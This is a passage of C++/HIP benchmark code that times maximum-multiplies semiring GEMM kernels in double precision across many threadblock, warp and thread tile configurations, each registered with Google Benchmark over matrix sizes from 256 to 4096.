benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x32x1_4x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x64x1_4x8_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x64x1_4x8_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 2 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x16x1_4x4_8x4_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x16x1_4x4_8x4_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 0) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x32x1_8x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x32x1_8x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 2 // Threadblock: 128 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_64x16x1_8x4_8x4_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<64, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_64x16x1_8x4_8x4_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 16 x 64 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x16_8x16x1_2x2_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x16_8x16x1_2x2_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 16 x 128 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x16_8x32x1_2x4_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 128, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x16_8x32x1_2x4_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 4 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x8x1_2x2_8x4_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 8, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x8x1_2x2_8x4_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x16x1_4x2_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x16x1_4x2_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 32 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x32x1_4x4_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x32x1_4x4_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 4 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x16x1_4x4_8x4_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x16x1_4x4_8x4_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_8x16x1_2x2_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_8x16x1_2x2_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_16x16x1_4x2_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_16x16x1_4x2_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x32x1_4x4_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x32x1_4x4_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 2 // Threadblock: 128 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_32x16x1_4x4_8x4_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_32x16x1_4x4_8x4_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 32 x 64 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x16_8x16x1_2x2_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x16_8x16x1_2x2_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 32 x 128 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x16_8x32x1_2x4_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 